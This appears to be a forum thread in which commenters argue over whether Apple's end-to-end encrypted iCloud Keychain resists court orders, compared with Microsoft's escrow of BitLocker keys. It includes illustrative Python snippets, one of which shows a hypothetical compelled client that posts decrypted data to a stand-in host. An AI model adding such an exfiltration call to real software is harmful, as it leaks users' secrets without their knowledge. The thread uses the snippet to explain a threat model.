Apple's solution is iCloud Keychain, which is E2E encrypted, so it would not be revealed by a court order.
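For anyone unfamiliar with what "E2E encrypted" buys you here, a minimal sketch of the idea (not Apple's actual implementation; the KDF, parameters, and values are illustrative): the key is derived on the device from a secret only the user knows, so the server only ever holds ciphertext it cannot open.

    import base64, os
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
    from cryptography.fernet import Fernet

    # Derive the encryption key on-device from a user secret.
    # The server never sees the passcode or the derived key.
    salt = os.urandom(16)
    kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32,
                     salt=salt, iterations=600_000)
    key = base64.urlsafe_b64encode(kdf.derive(b"user passcode"))

    # Encrypt locally; only the ciphertext is uploaded.
    ciphertext = Fernet(key).encrypt(b"hunter2")

    # A court order served on the provider yields only `ciphertext`
    # and `salt`, which are useless without the user's passcode.
    assert Fernet(key).decrypt(ciphertext) == b"hunter2"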




What is your proof they don't have a duplicate key that also unlocks it? A firm handshake from Tim?

You should watch the whole Black Hat talk (from 2016!) by Apple's Head of Security Engineering and Architecture, but especially this part:

https://www.youtube.com/watch?v=BLGFriOKz6U&t=1993s


A lot of trust in words that cannot be verified.

If they say they don't, and they do, then that's fraud, and they could be held liable for any damages that result. And if word got out that they were defrauding customers, that would cause serious reputational damage to Apple (which uses its security practices as an industry differentiator) and possibly a significant customer shift away from them. They don't want that.

The government would never prosecute a company for fraud where that fraud consists of cooperating with the government after promising to a suspected criminal that they wouldn't.

That's not the scenario I was thinking of. There are other possibilities here, like providing a decryption key (even if by accident) to a criminal who's stolen a business's laptop, or if a business had made contractual promises to their customers, based on Apple's promises to them. The actions would be private (civil) ones, not criminal fraud prosecution.

Besides, Apple's lawyers aren't stupid enough to forget to carve out a law-enforcement demand exception.


Cooperating with law enforcement cannot be fraud. Fraud is lying for illegal gain. I think it's legally OK to lie if the goal is to catch a criminal and help the government.

For example, in the 20th century, a European manufacturer of encryption machines (Crypto AG [1]) built a backdoor at the request of governments and was never punished; instead, it received generous payments.

[1] https://en.wikipedia.org/wiki/Crypto_AG


Absent the source code, it's incredibly difficult to disprove when the only proof you have is good vibes.

There are many things you can't prove or disprove in this world. That's where trust and reputation come in: to fill the uncertainty gap.


None of these really match the scenario we're discussing here. Some are typical big-company stuff, some are technical edge cases, but none are "Apple lies about a fundamental security practice consistently and with malice."

Cognitive dissonance. You've already made up your mind; no evidence will change it. Any evidence you get is cast aside for one reason or another.

> "Apple lies about a fundamental security practice consistently and with malice"

Uploading passwords to the cloud should count. Also this: https://sneak.berlin/20231005/apple-operating-system-surveil...


That link you provided is a "conspiracy theory," even by the author's own admission. That article is also outdated; OCSP is as dead as a doornail (no doubt in part because it could be used for surveillance) and they fixed the cleartext transmission of hardware identifiers.

Are you expecting perfection here? Or are you just being argumentative?


> That link you provided is a "conspiracy theory," even by the author's own admission.

"Conspiracy theory" is not the same as a crazy, crackhead theory. See: Endward Snowden.

Full quote from the article:

> Mind you, this is definitionally a conspiracy theory; please don’t let the connotations of that phrase bias you, but please feel free to read this (and everything else on the internet) as critically as you wish.

> and they fixed the cleartext transmission of hardware identifiers

Have you got any links for that?

> Are you expecting perfection here? Or are you just being argumentative?

I expect the basic things people should expect from a company that promotes itself as respecting privacy. And I don't expect them to be much worse than GNU/Linux in that respect (but they definitely are).


> Have you got any links for that?

It was noted at the bottom of the article as a follow-up.

> I expect the basic things people should expect from a company that promotes itself as respecting privacy. And I don't expect them to be much worse than GNU/Linux in that respect (but they definitely are).

The problem with the word “basic” is that it’s entirely subjective. What you consider “basic,” others consider advanced. Plus, the floor has shifted over the years as threat actors have become more knowledgeable, threats more sophisticated, and technologies more advanced.

Finally, the comparison to Linux doesn’t make a lot of sense. Apple provides a solution of integrated hardware, OS, and services. Linux has a much smaller scope; it’s just a kernel. If you don’t operate services, then by definition, you don’t have any transmitted data to protect. Nevertheless, if you consider the software packages that distros package alongside that kernel, I would encourage you to peruse the CVE databases to see just how many security notices have been filed against them and which remain open. It’s not all sunshine and roses over in Linux land, and never has been.


At the end of the day, it's all about how you weigh the evidence. If those examples are sufficient to tip the scales for you, that's your choice. However, Apple's overall trustworthiness, particularly when it comes to protecting people's sensitive data, remains high in the market. Even the examples you posted aren't especially pertinent to that (except for iCloud Keychain, where the complaint isn't whether Apple stores it securely, but that it got transmitted to them in the first place, and there remains some unresolved ambiguity about whether it is deleted on demand).

Apple has the number 1 marketing team in the world. They got away with PRISM and terrible security.

They are immune to reputation damage. Teens and moms don't care.


Terrible security... compared to what? Some ideal state that exists in your head, or a real-world benchmark? Do you expect them to ignore lawful orders from governments as well?

> Apple's solution is iCloud Keychain, which is E2E encrypted, so it would not be revealed by a court order.

Nope. For this threat model, E2E is a complete joke when both E's are controlled by the third party. Apple could be compelled by the government to insert code into the client that uploads your decrypted data to another endpoint they control, and you'd never know.
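To make the failure mode concrete, here is a hypothetical sketch (the function and endpoint are invented for illustration, continuing the Fernet example above): the client necessarily holds the plaintext after decryption, so a compelled build can forward it anywhere without touching the E2E crypto itself.

    import urllib.request
    from cryptography.fernet import Fernet

    def open_keychain(ciphertext: bytes, key: bytes) -> bytes:
        # The E2E cryptography is sound; decryption happens client-side.
        plaintext = Fernet(key).decrypt(ciphertext)

        # A compelled (or malicious) client update needs only one extra
        # call. The ciphertext on the server stays untouched, and the
        # user sees no change in behavior. Hypothetical endpoint:
        urllib.request.urlopen("https://intercept.example/collect",
                               data=plaintext)
        return plaintext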


That was tested in the San Bernardino shooter case. Apple stood up and the FBI backed down.

It's incredibly naive to believe Apple will continue to be able to do that.

Yeah, and Microsoft could insert code to upload the BitLocker keys. What's your point? Even Linux could do that if they were compelled to.

> Even Linux could do that if they were compelled to.

An open source project absolutely cannot do that without your consent if you build your client from the source. That's my point.
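In practice, "consent" here means verifying that what you build matches what was published and audited. A minimal sketch, assuming the project publishes a hash of the release tarball in signed release notes (the file names and hash are illustrative placeholders):

    import hashlib, subprocess, sys

    def sha256(path: str) -> str:
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        return h.hexdigest()

    # Hash taken from the project's signed release notes
    # (placeholder value for illustration).
    PUBLISHED_SHA256 = "..."

    if sha256("client-1.0.tar.gz") != PUBLISHED_SHA256:
        sys.exit("tarball does not match the audited source!")

    # Build locally: the vendor gets no opportunity to substitute
    # a different binary after the source has been reviewed.
    subprocess.run(["tar", "xzf", "client-1.0.tar.gz"], check=True)
    subprocess.run(["make", "-C", "client-1.0"], check=True)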


This is a wildly unrealistic viewpoint. It assumes that you somehow know the language of the client you’re building, have total knowledge of the entire codebase, and can easily spot any sort of security issue or backdoor, assuming you’re using software that you yourself didn’t write (and even then).

This also completely disregards the history of vulnerability incidents like XZ Utils, the infected NPM packages of the month, and even, for example, CVEs that have been found to have existed in Linux (a project with thousands of people working on it) for over a decade.


You're conflating two orthogonal threat models here.

Threat model A: I want to be secure against a government agency in my country using the ordinary judicial process to order engineers employed in my country to make technical modifications to products I use in order to spy on me specifically. Predicated on the (untrue in my personal case) idea that my life will be endangered if the government obtains my data.

Threat model B: I want to be secure against all nation state actors in the world who might ever try to surreptitiously backdoor any open source project that has ever existed.

I'm talking about threat model A. You're describing threat model B, and I don't disagree with you that fighting that is more or less futile.

Many open source projects are controlled by people who do not live in the US and are not US citizens. Someone in the US is completely immune to threat model A when they use those open source projects and build them directly from the source.


Wait, I'm sorry, do you build Linux from source and review all code changes?

You missed the important part:

> For this threat model

We're talking about a hypothetical scenario where a state actor obtaining the information protected by the E2E encryption puts your life or freedom in danger.

If that's you, yes, you absolutely shouldn't trust US corporations, and you should absolutely be auditing the source code. I seriously doubt that's you though, and it's certainly not me.

The subtitle of the original Forbes article (linked in the first paragraph of TFA):

> But companies like Apple and Meta set up their systems so such a privacy violation isn’t possible.

...is completely, utterly false. The journalist swallowed the marketing whole.


Okay, so yes, I grant your point that people whose threat model includes governments should be auditing source code.

I also grant that many things are possible (where the journalist says "isn't possible").

However, what remains true is that Microsoft appears to store this data in a manner that allows it to be retrieved through "simple" warrants and legal processes, compared to Apple, where these encryption keys are stored in a manner that would require code changes to retrieve.

These are fundamentally different in a legal framework, and while it doesn't make Apple the most perfect, amazing company ever, it shames Microsoft for not putting in the technical work to erect these basic barriers to retrieving data.
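The distinction, sketched below (both models heavily simplified; the data and function names are illustrative): under escrow, the provider can answer a warrant with data it already holds, while under E2E it would first have to ship modified client code.

    # Escrow model (roughly the BitLocker recovery-key complaint):
    # the server holds the key, so a warrant is satisfied with an
    # ordinary database lookup. No engineering step required.
    escrow_db = {"user@example.com": b"recovery-key-bytes"}

    def serve_warrant_escrow(account: str) -> bytes:
        return escrow_db[account]

    # E2E model: the server holds only ciphertext. Satisfying the
    # same warrant means changing the client to leak the key, which
    # is a different, and legally distinct, kind of compulsion.
    e2e_db = {"user@example.com": b"opaque-ciphertext-bytes"}

    def serve_warrant_e2e(account: str) -> bytes:
        return e2e_db[account]  # useless without the user's key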


> retrieved through "simple" warrants and legal processes

The fact that it requires an additional engineering step is not an impediment. The courts could not care less about the implementation details.

> compared to Apple, where these encryption keys are stored in a manner that would require code changes to retrieve.

That code already exists at Apple: the automated CSAM reporting Apple does subverts their iCloud E2E encryption. I'm not saying they shouldn't be doing that; it's just proof they can, and already do, effectively bypass their own E2E encryption.

A pedant might say, "well, that code only runs on the device, so it doesn't really bypass E2E." What that misses is that the code running on the device is under the complete and sole control of Apple, not the device's owner. That code can do anything Apple cares to make it do (or is ordered to make it do) with the decrypted data, including exfiltrating it, and the owner will never know.


> The courts could not care less about the implementation details

That's not really true in practice, by all public evidence.

> the automated CSAM reporting Apple does

Apple does not have a CSAM reporting feature that scans photo libraries; it never rolled out. They only have a feature that can blur sexual content in Messages and warn the recipient before viewing.

We can argue all day about this, but yeah, I guess it's true that your phone is closed source, so literally everything you do is "under the complete and sole control of Apple."

That just sends us back to the first point, and we can never settle the argument if we disagree about how far the government might compel a company to go to produce data.



